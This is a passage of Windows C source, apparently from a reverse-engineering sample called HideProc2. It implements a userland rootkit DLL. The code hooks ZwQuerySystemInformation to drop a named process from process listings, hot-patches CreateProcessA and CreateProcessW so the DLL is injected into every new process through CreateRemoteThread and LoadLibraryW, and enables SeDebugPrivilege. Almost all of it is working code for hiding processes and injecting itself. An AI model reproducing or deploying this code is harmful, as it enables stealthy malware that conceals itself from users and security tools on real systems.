113.     dwAddress = (DWORD)pfnNew - (DWORD)pFunc;  
114.     memcpy(&pBuf[1], &dwAddress, 4);  
115.     memcpy((LPVOID)((DWORD)pFunc - 5), pBuf, 5);  
116.       
117.      
118.     memcpy(pFunc, pBuf2, 2);  
119.   
120.     VirtualProtect((LPVOID)((DWORD)pFunc - 5), 7, dwOldProtect, &dwOldProtect);  
121.   
122.     return TRUE;  
123. }  
124.   
125. BOOL unhook_by_code(LPCSTR szDllName, LPCSTR szFuncName, PBYTE pOrgBytes)  
126. {  
127.     FARPROC pFunc;  
128.     DWORD dwOldProtect;  
129.     PBYTE pByte;  
130.   
131.     pFunc = (FARPROC)GetProcAddress(GetModuleHandleA(szDllName), szFuncName);  
132.     pByte = (PBYTE)pFunc;  
133.     if( pByte[0] != 0xE9 )  
134.         return FALSE;  
135.   
136.     VirtualProtect((LPVOID)pFunc, 5, PAGE_EXECUTE_READWRITE, &dwOldProtect);  
137.   
138.     memcpy(pFunc, pOrgBytes, 5);  
139.   
140.     VirtualProtect((LPVOID)pFunc, 5, dwOldProtect, &dwOldProtect);  
141.   
142.     return TRUE;  
143. }  
144.   
145. BOOL unhook_by_hotpatch(LPCSTR szDllName, LPCSTR szFuncName)  
146. {  
147.     FARPROC pFunc;  
148.     DWORD dwOldProtect;  
149.     PBYTE pByte;  
150.     BYTE pBuf[5] = { 0x90, 0x90, 0x90, 0x90, 0x90 };  
151.     BYTE pBuf2[2] = { 0x8B, 0xFF };  
152.   
153.   
154.     pFunc = (FARPROC)GetProcAddress(GetModuleHandleA(szDllName), szFuncName);  
155.     pByte = (PBYTE)pFunc;  
156.     if( pByte[0] != 0xEB )  
157.         return FALSE;  
158.   
159.     VirtualProtect((LPVOID)pFunc, 5, PAGE_EXECUTE_READWRITE, &dwOldProtect);  
160.   
161.     
162.     memcpy((LPVOID)((DWORD)pFunc - 5), pBuf, 5);  
163.       
164.   
165.     memcpy(pFunc, pBuf2, 2);  
166.   
167.     VirtualProtect((LPVOID)pFunc, 5, dwOldProtect, &dwOldProtect);  
168.   
169.     return TRUE;  
170. }  
171.   
172. BOOL SetPrivilege(LPCTSTR lpszPrivilege, BOOL bEnablePrivilege)   
173. {  
174.     TOKEN_PRIVILEGES tp;  
175.     HANDLE hToken;  
176.     LUID luid;  
177.   
178.     if( !OpenProcessToken(GetCurrentProcess(),  
179.                           TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,   
180.                           &hToken) )  
181.     {  
182.         printf("OpenProcessToken error: %u\n", GetLastError());  
183.         return FALSE;  
184.     }  
185.   
186.     if( !LookupPrivilegeValue(NULL,               
187.                               lpszPrivilege,     
188.                               &luid) )            
189.     {  
190.         printf("LookupPrivilegeValue error: %u\n", GetLastError() );   
191.         return FALSE;   
192.     }  
193.   
194.     tp.PrivilegeCount = 1;  
195.     tp.Privileges[0].Luid = luid;  
196.     if( bEnablePrivilege )  
197.         tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;  
198.     else  
199.         tp.Privileges[0].Attributes = 0;  
200.   
201.   
202.     if( !AdjustTokenPrivileges(hToken,   
203.                                FALSE,   
204.                                &tp,   
205.                                sizeof(TOKEN_PRIVILEGES),   
206.                                (PTOKEN_PRIVILEGES) NULL,   
207.                                (PDWORD) NULL) )  
208.     {   
209.         printf("AdjustTokenPrivileges error: %u\n", GetLastError() );   
210.         return FALSE;   
211.     }   
212.   
213.     if( GetLastError() == ERROR_NOT_ALL_ASSIGNED )  
214.     {  
215.         printf("The token does not have the specified privilege. \n");  
216.         return FALSE;  
217.     }   
218.   
219.     return TRUE;  
220. }  
221.   
222. BOOL InjectDll2(HANDLE hProcess, LPCTSTR szDllName)  
223. {  
224.     HANDLE hThread;  
225.     LPVOID pRemoteBuf;  
226.     DWORD dwBufSize = (DWORD)(_tcslen(szDllName) + 1) * sizeof(TCHAR);  
227.     FARPROC pThreadProc;  
228.   
229.     pRemoteBuf = VirtualAllocEx(hProcess, NULL, dwBufSize,   
230.                                 MEM_COMMIT, PAGE_READWRITE);  
231.     if( pRemoteBuf == NULL )  
232.         return FALSE;  
233.   
234.     WriteProcessMemory(hProcess, pRemoteBuf, (LPVOID)szDllName,   
235.                        dwBufSize, NULL);  
236.   
237.     pThreadProc = GetProcAddress(GetModuleHandleA("kernel32.dll"),   
238.                                  "LoadLibraryW");  
239.     hThread = CreateRemoteThread(hProcess, NULL, 0,   
240.                                  (LPTHREAD_START_ROUTINE)pThreadProc,   
241.                                  pRemoteBuf, 0, NULL);  
242.     WaitForSingleObject(hThread, INFINITE);   
243.   
244.     VirtualFreeEx(hProcess, pRemoteBuf, 0, MEM_RELEASE);  
245.   
246.     CloseHandle(hThread);  
247.   
248.     return TRUE;  
249. }  
250.   
251. NTSTATUS WINAPI NewZwQuerySystemInformation(  
252.     SYSTEM_INFORMATION_CLASS SystemInformationClass,   
253.     PVOID SystemInformation,   
254.     ULONG SystemInformationLength,   
255.     PULONG ReturnLength)  
256. {  
257.     NTSTATUS status;  
258.     FARPROC pFunc;  
259.     PSYSTEM_PROCESS_INFORMATION pCur, pPrev;  
260.     char szProcName[MAX_PATH] = {0,};  
261.   
262.     unhook_by_code("ntdll.dll", "ZwQuerySystemInformation", g_pOrgZwQSI);  
263.   
264.     pFunc = GetProcAddress(GetModuleHandleA("ntdll.dll"),   
265.                            "ZwQuerySystemInformation");  
266.     status = ((PFZWQUERYSYSTEMINFORMATION)pFunc)  
267.              (SystemInformationClass, SystemInformation,   
268.               SystemInformationLength, ReturnLength);  
269.   
270.     if( status != STATUS_SUCCESS )  
271.         goto __NTQUERYSYSTEMINFORMATION_END;  
272.   
273.     if( SystemInformationClass == SystemProcessInformation )  
274.     {  
275.         pCur = (PSYSTEM_PROCESS_INFORMATION)SystemInformation;  
276.   
277.         while(TRUE)  
278.         {  
279.             if(pCur->Reserved2[1] != NULL)  
280.             {  
281.                 if(!_tcsicmp((PWSTR)pCur->Reserved2[1], STR_HIDE_PROCESS_NAME))  
282.                 {  
283.                     if(pCur->NextEntryOffset == 0)  
284.                         pPrev->NextEntryOffset = 0;  
285.                     else  
286.                         pPrev->NextEntryOffset += pCur->NextEntryOffset;  
287.                 }  
288.                 else          
289.                     pPrev = pCur;     
290.             }  
291.   
292.             if(pCur->NextEntryOffset == 0)  
293.                 break;  
294.   
295.             pCur = (PSYSTEM_PROCESS_INFORMATION)((ULONG)pCur + pCur->NextEntryOffset);  
296.         }  
297.     }  
298.   
299. __NTQUERYSYSTEMINFORMATION_END:  
300.   
301.     hook_by_code("ntdll.dll", "ZwQuerySystemInformation",   
302.                  (PROC)NewZwQuerySystemInformation, g_pOrgZwQSI);  
303.   
304.     return status;  
305. }  
306.   
307. BOOL WINAPI NewCreateProcessA(  
308.     LPCTSTR lpApplicationName,  
309.     LPTSTR lpCommandLine,  
310.     LPSECURITY_ATTRIBUTES lpProcessAttributes,  
311.     LPSECURITY_ATTRIBUTES lpThreadAttributes,  
312.     BOOL bInheritHandles,  
313.     DWORD dwCreationFlags,  
314.     LPVOID lpEnvironment,  
315.     LPCTSTR lpCurrentDirectory,  
316.     LPSTARTUPINFO lpStartupInfo,  
317.     LPPROCESS_INFORMATION lpProcessInformation  
318. )  
319. {  
320.     BOOL bRet;  
321.     FARPROC pFunc;  
322.   
323.      
324.     pFunc = GetProcAddress(GetModuleHandleA("kernel32.dll"), "CreateProcessA");  
325.     pFunc = (FARPROC)((DWORD)pFunc + 2);  
326.     bRet = ((PFCREATEPROCESSA)pFunc)(lpApplicationName,  
327.                                      lpCommandLine,  
328.                                      lpProcessAttributes,  
329.                                      lpThreadAttributes,  
330.                                      bInheritHandles,  
331.                                      dwCreationFlags,  
332.                                      lpEnvironment,  
333.                                      lpCurrentDirectory,  
334.                                      lpStartupInfo,  
335.                                      lpProcessInformation);  
336.   
337.      
338.     if( bRet )  
339.         InjectDll2(lpProcessInformation->hProcess, STR_MODULE_NAME);  
340.   
341.     return bRet;  
342. }  
343.   
344. BOOL WINAPI NewCreateProcessW(  
345.     LPCTSTR lpApplicationName,  
346.     LPTSTR lpCommandLine,  
347.     LPSECURITY_ATTRIBUTES lpProcessAttributes,  
348.     LPSECURITY_ATTRIBUTES lpThreadAttributes,  
349.     BOOL bInheritHandles,  
350.     DWORD dwCreationFlags,  
351.     LPVOID lpEnvironment,  
352.     LPCTSTR lpCurrentDirectory,  
353.     LPSTARTUPINFO lpStartupInfo,  
354.     LPPROCESS_INFORMATION lpProcessInformation  
355. )  
356. {  
357.     BOOL bRet;  
358.     FARPROC pFunc;  
359.   
360.      
361.     pFunc = GetProcAddress(GetModuleHandleA("kernel32.dll"), "CreateProcessW");  
362.     pFunc = (FARPROC)((DWORD)pFunc + 2);  
363.     bRet = ((PFCREATEPROCESSW)pFunc)(lpApplicationName,  
364.                                      lpCommandLine,  
365.                                      lpProcessAttributes,  
366.                                      lpThreadAttributes,  
367.                                      bInheritHandles,  
368.                                      dwCreationFlags,  
369.                                      lpEnvironment,  
370.                                      lpCurrentDirectory,  
371.                                      lpStartupInfo,  
372.                                      lpProcessInformation);  
373.   
374.      
375.     if( bRet )  
376.         InjectDll2(lpProcessInformation->hProcess, STR_MODULE_NAME);  
377.   
378.     return bRet;  
379. }  
380.   
381. BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)  
382. {  
383.     char            szCurProc[MAX_PATH] = {0,};  
384.     char            *p = NULL;  
385.   
386.      
387.     GetModuleFileNameA(NULL, szCurProc, MAX_PATH);  
388.     p = strrchr(szCurProc, '\\');  
389.     if( (p != NULL) && !_stricmp(p+1, "HideProc2.exe") )  
390.         return TRUE;  
391.   
392.      
393.     SetPrivilege(SE_DEBUG_NAME, TRUE);  
394.   
395.     switch( fdwReason )  
396.     {  
397.         case DLL_PROCESS_ATTACH :   
398.           
399.             hook_by_hotpatch("kernel32.dll", "CreateProcessA",   
400.                              (PROC)NewCreateProcessA);  
401.             hook_by_hotpatch("kernel32.dll", "CreateProcessW",   
402.                              (PROC)NewCreateProcessW);  
403.             hook_by_code("ntdll.dll", "ZwQuerySystemInformation",   
404.                          (PROC)NewZwQuerySystemInformation, g_pOrgZwQSI);  
405.             break;  
406.   
407.         case DLL_PROCESS_DETACH :  
408.      
409.             unhook_by_hotpatch("kernel32.dll", "CreateProcessA");  
410.             unhook_by_hotpatch("kernel32.dll", "CreateProcessW");  
411.             unhook_by_code("ntdll.dll", "ZwQuerySystemInformation",   
412.                            g_pOrgZwQSI);  
413.             break;  
414.     }  
415.   
416.     return TRUE;  
417. }